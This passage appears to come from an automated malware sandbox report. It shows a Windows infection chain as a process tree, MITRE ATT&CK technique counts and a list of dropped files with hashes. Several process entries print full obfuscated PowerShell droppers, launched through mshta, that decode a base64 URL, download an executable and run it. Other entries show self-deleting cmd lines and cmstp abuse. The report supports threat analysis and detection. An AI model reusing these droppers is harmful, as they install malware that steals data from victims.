                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1872
                • C:\Users\Public\enk.exe
                  "C:\Users\Public\enk.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2368
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                    • Loads dropped DLL
                    PID:2072
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2468
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                        8⤵
                        • Loads dropped DLL
                        PID:2968
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2056
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:1564
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2264
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 2264 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\790956591365984\\* & exit
                          9⤵
                            PID:1112
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 2264
                              10⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1984
                    • C:\Users\Public\enk.exe
                      "C:\Users\Public\enk.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:428
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\b1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1548
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:316
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                3⤵
                • Delays execution with timeout.exe
                PID:1916
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\ba.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:240
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1644
                  • C:\Users\Public\pya.exe
                    "C:\Users\Public\pya.exe"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2412
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2596
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2828
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 2828 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\412824232396618\\* & exit
                          8⤵
                            PID:2868
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 2828
                              9⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2152
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2640
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2924
                      • C:\Users\Public\pya.exe
                        "C:\Users\Public\pya.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops desktop.ini file(s)
                        • Modifies system certificate store
                        PID:2744
                        • C:\Users\Admin\AppData\Local\Temp\jVZh36nC8Z.exe
                          "C:\Users\Admin\AppData\Local\Temp\jVZh36nC8Z.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:1608
                        • C:\Users\Admin\AppData\Local\Temp\SsPZ04uwZl.exe
                          "C:\Users\Admin\AppData\Local\Temp\SsPZ04uwZl.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:1796
                        • C:\Users\Admin\AppData\Local\Temp\JnwG1WRXXj.exe
                          "C:\Users\Admin\AppData\Local\Temp\JnwG1WRXXj.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:3068
                          • \??\c:\windows\SysWOW64\cmstp.exe
                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\edhanee3.inf
                            8⤵
                              PID:956
                          • C:\Users\Admin\AppData\Local\Temp\OLT8ikiePp.exe
                            "C:\Users\Admin\AppData\Local\Temp\OLT8ikiePp.exe"
                            7⤵
                            • Executes dropped EXE
                            • Windows security modification
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2988
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1624
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\pya.exe"
                            7⤵
                              PID:2288
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                8⤵
                                • Delays execution with timeout.exe
                                PID:2468
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\ba1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:884
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1016

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Defense Evasion

                Modify Registry

                4
                T1112

                Disabling Security Tools

                2
                T1089

                Install Root Certificate

                1
                T1130

                Credential Access

                Credentials in Files

                3
                T1081

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Collection

                Data from Local System

                3
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\MSVCP140.dll
                • C:\ProgramData\VCRUNTIME140.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\msvcp140.dll
                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleHandler.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\AccessibleMarshal.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\IA2Marshal.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MSVCP140.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\MapiProxy_InUse.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\VCRUNTIME140.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l1-2-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-file-l2-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-handle-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-heap-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-interlocked-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-libraryloader-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-localization-l1-2-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-memory-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-namedpipe-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processenvironment-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-processthreads-l1-1-1.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-profile-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-rtlsupport-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-string-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-synch-l1-2-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-sysinfo-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-timezone-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-core-util-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-conio-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-convert-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-environment-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-filesystem-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-heap-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-locale-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-math-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-multibyte-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-private-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-process-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-runtime-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-stdio-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-string-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-time-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\api-ms-win-crt-utility-l1-1-0.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\breakpadinjector.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldap60.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ldif60.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\lgpllibs.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\libEGL.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozMapi32_InUse.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssckbi.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nssdbm3.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\prldap60.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\qipcap.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
                • C:\Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\ucrtbase.dll
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB483A9C8338B44FA92EBFE8CDF303EF
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB483A9C8338B44FA92EBFE8CDF303EF
                • C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\Are.docx
                • C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\Files.docx
                • C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\Opened.docx
                • C:\Users\Admin\AppData\LocalLow\cr6im03b56g32r\Recently.docx
